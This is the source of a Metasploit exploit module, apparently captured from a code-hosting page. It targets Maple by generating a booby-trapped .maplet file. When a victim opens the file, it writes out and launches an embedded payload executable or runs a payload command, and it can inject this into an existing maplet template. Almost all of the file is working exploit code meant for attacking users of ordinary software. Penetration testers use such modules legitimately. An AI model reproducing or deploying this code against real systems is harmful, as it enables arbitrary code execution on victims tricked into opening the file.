Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
19848 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Maple Maplet File Creation and Command Execution',16'Description' => %q{17This module harnesses Maple's ability to create files and execute commands18automatically when opening a Maplet. All versions up to 13 are suspected19vulnerable. Testing was conducted with version 13 on Windows. Standard security20settings prevent code from running in a normal maple worksheet without user21interaction, but those setting do not prevent code in a Maplet from running.2223In order for the payload to be executed, an attacker must convince someone to24open a specially modified .maplet file with Maple. By doing so, an attacker can25execute arbitrary code as the victim user.26},27'License' => MSF_LICENSE,28'Author' => [29'scriptjunkie'30],31'References' => [32[ 'OSVDB', '64541'],33[ 'URL', 'http://www.maplesoft.com/products/maple/' ]34],35'Payload' => {36'Space' => 1024,37'BadChars' => '',38'DisableNops' => true,39# 'Compat' =>40# {41# 'PayloadType' => 'cmd',42# 'RequiredCmd' => 'generic perl telnet',43# }44},45'Platform' => %w{win linux unix},46'Targets' => [47[48'Windows',49{50'Arch' => ARCH_X86,51'Platform' => 'win'52}53],5455[56'Windows X64',57{58'Arch' => ARCH_X64,59'Platform' => 'win'60}61],6263[64'Linux',65{66'Arch' => ARCH_X86,67'Platform' => 'linux'68}69],7071[72'Linux X64',73{74'Arch' => ARCH_X64,75'Platform' => 'linux'76}77],7879[80'Universal CMD',81{82'Arch' => ARCH_CMD,83'Platform' => %w{linux unix win}84}85]8687],88'DisclosureDate' => '2010-04-26',89'DefaultTarget' => 0,90'Notes' => {91'Reliability' => UNKNOWN_RELIABILITY,92'Stability' => UNKNOWN_STABILITY,93'SideEffects' => UNKNOWN_SIDE_EFFECTS94}95)96)9798register_options(99[100OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),101OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),102]103)104end105106def exploit107cmd = ''108content = ''109if target['Arch'] != ARCH_CMD110# Get payload as executable on whatever platform111binary = generate_payload_exe112113# Get filename and random variable name for file handle in script114fname = rand_text_alpha(3 + rand(15))115if target['Platform'] == 'win'116fname << ".exe"117end118fhandle = rand_text_alpha(3 + rand(15))119120# Write maple commands to create executable121content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"122exe = binary.unpack('C*')123124content << "writebytes(#{fhandle},[#{exe[0]}"125lines = []1261.upto(exe.length - 1) do |byte|127if (byte % 100 == 0)128lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"129else130lines.push ",#{exe[byte]}"131end132end133content << lines.join("") + "]);\r\n"134135content << "fclose(" + fhandle + ");\n"136# Write command to be executed137if target['Platform'] != 'win'138content << "system(\"chmod a+x #{fname}\");\n"139end140content << "system[launch](\"#{fname}\");\n"141else142content << "system(\"#{payload.encoded}\");\n"143end144145# Then put the rest of the original maplet146if datastore['TEMPLATE'] != ''147File.open(datastore['TEMPLATE'], 'rb') do |fd|148content << fd.read(File.size(datastore['TEMPLATE']))149end150end151152# Create the file153print_status("Creating '#{datastore['FILENAME']}' file...")154file_create(content)155end156end157158159